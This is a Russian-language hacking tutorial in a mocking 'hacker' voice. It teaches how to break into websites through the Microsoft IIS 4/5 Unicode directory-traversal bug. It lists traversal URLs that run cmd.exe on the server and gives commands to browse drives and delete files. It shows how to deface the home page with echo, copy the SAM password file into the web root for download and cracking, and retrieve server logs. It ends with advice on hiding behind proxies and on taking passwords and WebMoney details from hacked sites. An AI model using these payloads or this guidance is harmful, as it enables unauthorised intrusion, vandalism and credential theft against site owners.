Взлом сайта

INTRO .

Приветствую тебя, о горе хакер, сколько ты уже страничек навернул (?) , сколько ты уже админов обидил свим дефейсом ? Что, нисколько? Ну ладно, горе юзер, научу я тебя в этой статье тому, как можно взломать страничку, примерно, этак минут за 20. Ломать мы с тобой сегодня будим через всем хорошо известный Unicode Bug , если ты еще не знаешь что это такое, то я тебе поведаю об этом.

Unicode Bug - где это и как?

Ну что ж , UNICODE BUG - это стандартный недавний , давний ( нужное вычеркнуть ) баг в Microsoft' овской IIS на серверах. Почему недавний (?)- спросишь ты, а я отвечу - недавний, так как обноружен был только в четвертой и пятой версиях Microsoft IIS. Как говорится - баг, стандарт де факто одним предложением это можно сказать так: С помощью нескольких команд ты проникаешь на драйв сервера, другой лазаешь по папкам и находишь index.htm или default.htm , ну а третьей проводишь дефейс. Правдо все легко? Да? Ан нет, не все так легко как кажется , ну что же , давай начнем наше темненькое дельце ?

Пингуем сервак и обноруживаем что у них стоит .

Так, вопервых, нам на сервере необходимо обнаружить Microsoft IIS 4 или 5 на сервере, и что бы стояла она на windows 98 NT или 2000 . На NT в основном стоит IIS 4 , впрочем и так тоже нормально. Кстати, с IIS под виндовсы меньше возьни чем допустим , с Аппчей, или еще каким нибуть другим типом сервера. Так вот, я отвлекся... что бы обноружить то, что стоит на серваке, необходимо зайти на wwwnetcraft.com/ , потом ткнуть на ссылку What's that site running? , и слева будет одно поле, туда вводим урл на необходимый сайт и жмем Examine , потом ищи надпись The site wwwсервак.ru is running Microsoft-IIS/5.0 on Windows 2000 или должно быть - The site wwwсервак.ru is running Microsoft-IIS/4.0 on NT4/Windows 98 .Если нашел, то знай, ты почти у них на диске. Ну а если что то другое будет то ты не тот сайт за IIS сервак пингуешь. Ой , прошу прощения у любителей сканов типа SuperScan что не указал что пинговать на IIS надо сканером , а указал путь как проверить с вэба. Но можно и сканером, но я пожалуй не буду тебя утруждать, и нагружать про эти длинные истории... может
быть как нибуть в другой раз, в другой статье.

Проверяем сервак с IIS 4,5 на Unicode Bug .

Ну а теперь братец хацкер, если ты нашел хоть один такой сервер, то ты наверно уже очень хочешь пройтись по диску сервера, ведь правда? Ан нетушки, сервер может быть уже и пропатчен, так вот , давай проверим сервер на дырявость. Для этого необходимо добавить к урлу ломаемого тобой сайта строчки приведенные чуть ниже. И если после добавления очередной строчки
ты увидишь диск С:/ серванта, то знай, ты на верном пути.

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir+c:\

И если при добавлении очередной строчки у тебя открылося диск С:/ сервера, то знай, ты почти хакер

Находим InetPub и DEFAULT"овую страницу.

Так вот, ты на диске серванта, теперь на данный момент главное для тебя - найти InetPub/wwwroot/А дальше - что админ пошлет Так вот, тебе надо лазить по папкам, но ты незнаешь как, подскажу , видишь диск С:/ , допустим есть там папка InetPub , да, есть, и допустим ты сейчас тут : wwwсервер.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ так вот , мы берем и меняем строку так: wwwсервер.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\InetPub , кликаешь Enter , и видим содержание папки InetPub. Я думаю что все легко и просто . Так, смотрим, видим что есть папка samples , adminscripts, ftproot , wwwroot, опаньки , попалась щас мы туда и пойдем . А если же нету вообще нечего подобного на диске С:/ , значит - НЕТУ, иди на другой диск сервера и ищи это все там , делается это так , вот у тебя конец
строки : /c+dir+c:\ , меняй его на /c+dir+d:\ - то есть мы теперь переходим на диск D:/ и все по новой - ищи InetPub/wwwroot , так как именно в этой папке и хранится index.htm или default.htm. И все остальных страницы сайта. Но нам все остальные, думаю непонадовятся. Хотя, кто его знает Вдруг ты собрался полностью почистить сервак Так вот, допустим ты нашел , ага, как вижу - нашел Давай займемся собственно говоря, тем, зачем пришли, хаком и дефейсом Погоди еще, стой, я тебе еще не рассказал об одной команде которая тебе может понадобится, это - del . Так вот, что бы ее приминить - меняем конец нашей строки на вот такой /c+del+d:\inetpub\wwwroot\page.htm вот , это командой мы удаляем файл page.htm , и помни - путь и файл можешь писать свой

Взлом сайта

DEFACE.

Ты уже нашел страничку, и уже готов к дефейсу, наверно же уже и текст придумал ты говоришь - а почему текст?! Да потому что дефейс - плаин текстовый, ломаем мы ведь - не по ФТП, а уникод багом. Ну вот, ты огорчился что не повесишь картинку накануне нарисованную тобой? Не огорчайся, чуть дальше я тебе расскажу как можно получить полный доступ, или даже повесить
картинку. СТОП, я отвлекся, давайте начнем дефейсить?! Типа нужно добавить к урлу сервера вот эту строку : /scripts/ww.exe?/c+echo Hacked by Hacker>>с:/inetpub/wwwroot/default.htm Так, давай рассмотрим эту строку.
Мы видим - слова Hacked by Hacker - они то и будут висеть на главной странице ломаемого сайта, но, внизу странички А это нам неподходит, мы хотим что бы черным по белому было написанно что ВЗЛОМАННО То, меняем строку на вот эту : /scripts/ww.exe?/c+echo Hacked by Hacker>с:/inetpub/wwwroot/default.htm
Называется найди одно отличее т.е. у нас теперь наш текст не добавляется, а создает новую страничку, всмысле - не зодает, а в нашем случае - очищает и пишет наш дефейс текст Ну вот ты и герой но не последний думаю эту страничку после твоего взлома задефейсят еще миллион раз

Имеем полный доступ.

Давайте рассмотрим способ как можно поиметь полный доступ к сайту. Мы знаем что на сервере где то есть файл, с именем sam._ вообще написанно будет если увидишь , просто sam , так вот, в нем лежит пароль от сайта. Его то мы и будим мучать сейчас, давайте его перенесем в инетпаб/wwwroot и сольем с
сайта /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+d:\winnt\repair\sam d:\inetpub\wwwroot
Рассмотрим команду: /c+copy+d:\winnt\repair\sam - это мы копируем файл . И надо знать, что папка WINNT может находится на
любом диске , как на c:/ так и на D:/, так что это тебе надо учесть. Ну вот , и если у тебя будет написанно Ошибка в приложении CGI бла бла не возращены заголовки бла бла, а в низу написанно Отказано в доступе. Скопировано файлов: 0. или что то вроде Acces denied Files copy : 0 , это если ты сервак американский ломаешь, то знай - доступ к записи и перезаписи этого файла - закрыт. Значит не судьба тебе получить полный доступ к сайту. Ну а если написанно Скопировано файлов: 1 - то тебе повезло Иди на сайт и сливай файл. Если будет написанн только заголовок при команле type вместо dir , в моих
случаях это было что то вроде MSCD . То тебе нада как то по другом скачать файл, как - я незнаю. потом возьми прогу l0Pht crack , или как там она называется, и декодируй sam._ Может что и выйдет, хотя, врядли, так как может занять примерно около 5 дней декодирование. Вообще, правда, зачем нам нужно это декодировние, если можно дефейсить и картинкой и
прописывая титл Что еще от жизни надо? так вот, добавляем к урлу сервера эту строку:/scripts/ww.exe?/c+echo+"<html><title>Привет</title>
<STYLE>+BODY+{+background-image:+url(wwwxpaxo.net/xpaxologo.jpg);+}

</style></html>">d:/inetpub/wwwroot/Default.htm
Вот, выше представленна ОДНА строка, т.е. написанно двумя, но ты их совмести в одну строчку! Ну вот, тепеь на паге красуется дефейс, с титлом , и с бэкграундом. Вот такие вот дела

LOGS и как с ними бототься.

Давайте поближе подойдем к логам. В логи пишется ВСЕ! Все что было сделанно на сервере, хранятся логи тут winnt\system32\logfiles\ и дальше выбираешь в какую папку пойти , чаще всего это папки с именами типа W3SVC1. Вот в нее
и заходи. Перед тобой появится большой лист с файлами , имена у них in020113.log опять же рассмотрим имена файлов, написанно in , потом идет год, затем месяц, затем дата, короче- inГод/Мес/Дата.log , сделать им type вместо dir не пытайся,
если файл большой, или маленький, да все равно какой, он тебе не покажется. Что бы его просмотреть нужно скопировать в inetpub/wwwroot , сделать это можно вот это командой: /c+copy+d:\winnt\system32\logfiles\W3SVC1\inГод/Мес/Дат.log%20
d:\inetpub\wwwroot Вот, и где W3SVC1\inГод/Мес/Дат.log - это последующий путь к логу который тебе необходим. и d:\inetpub\wwwroot - тоже вполне может быть не на диске d:\ а на c:\ , думаю ты уже понял что копировать нам надо в ту папку где находится и дефолтовая страничка. Так вот, если скопировалось удачно то будет написанно Ошибка CGI Указанное приложение CGI не возвратило бла бла бла Скопировано файлов: 1. Все ОК, теперь лезем на ломаемый сайт где уже висит наш дефейс и добавляем имя файла который мы скопировали. Смотрим, вау! Большой файл, сохраняем себе на драйв его, дисконектаемся, открываем лог, читаем, ого ! Да там же есть ВСЕ К примеру рассмотрим эту строчку : 62.213.9.21, -, 13.01.2002, 0:07:51, W3SVC1, INET, 192.168.100.4, 1372, 305, 331, 200, 0, GET, /Default.htm, -, это тут вот что есть : IP , вполне может быть и из под прокси . Потом дата. Потом время, сразу оговорюсь - время которое на сервере а не у вас, затем следует какие то папки и функции, потом наверно IP с которого запрашивался данный файл. затем непонятного значения цифры, потом GET - это то , что делали с файлом, еще бывает POST, HEAD, что они точно обозначают я незнаю. А потом еще и дается файл который был открыт, всмысле - не открыт, а увиден. Ну ладно, теперь скажу зачем нужно читать логи. В логах можно вычитать очень много чего полезного. Можно вычитать IP админа, и прочих юзверей, можно вести маленькую статистику показыавая в гвесте сайта где большая посещаемость админ будет ошарашен , хотя нет, это все нам непонадобится. Или если ты вычитал сайт из архива взломанных серверов, типа как на wwwvoid.ru , то ты наверняка знаешь что где то там стоит дата взлома. Мы смотрим дату, лезем в раздел с логами на ломаемом сервере , ищим лог с датой взлома, как они именуются я описал выше. Копируй лог сам знаешь куда (описанно выше) и сливай, разглядывай и ищи способ взлома страницы, кстати, если нечего не нашел насчет взлома (это там должна быть команда типа echo) значит это стоит дата зеркалирования. А взлом может быть вполне двумя или одним днем раньше. Опять же лезем, ищим, находим, копируем, сохраняем, смотрим, опять же находим И теперь уже со спокойной душой дефейсим Все, дело сделанно , идем пить...э...типа что кому нравится...
Теперь рассмотрим способ сокрытия IP, ищим анонимный закрытый прокси и используем его, как использовать прокси , думаю ты знаешь, не маленький уже. И все, теперь твой IP подменяется при записи в логи. Но если админчики хакнутого тобой сайта очень захотят тебя вычислить и впоймать, то онивычислят проксика, обратятся к ним , скажут дату , время , и IP (подмененный) , а они выдадут тебя, это точно Но что бы обратится, им надо будет идти туда, где главный компьютер, или как бы еще сказать, у прокси, а этот компьютер может быть очень и очень далеко В другой стране допустим. Короче они тебя впоймают! Это
гарантированно Типа дома устроют "Маски-Шоу".

Извлекаем полезное из вzлома.

Хо хо, ты еще незнаешь что можно извлечь полезного из взлома?! А я тебе расскажу, хотя это уже и другая статья. НО, ты можешь вот что извлеч: 1. Маленькую, но популярность, сообщив о взломе в некоторые места Типа void.ru или xakep.ru , за рекламу прошу прощенья 2 . Личное самоудоволетворение. Типа ты взломал, и ты за себя даволен. 3 . можно найти на сайте пароли, от чего угодно, как от ВМ, это web money , так и до кодов и лецензионных программ, может админ на сайте хранит коллекцию более 3000 mp3 , но не дает об этом знать ?! Так сообщи народу где эта коллекция лежи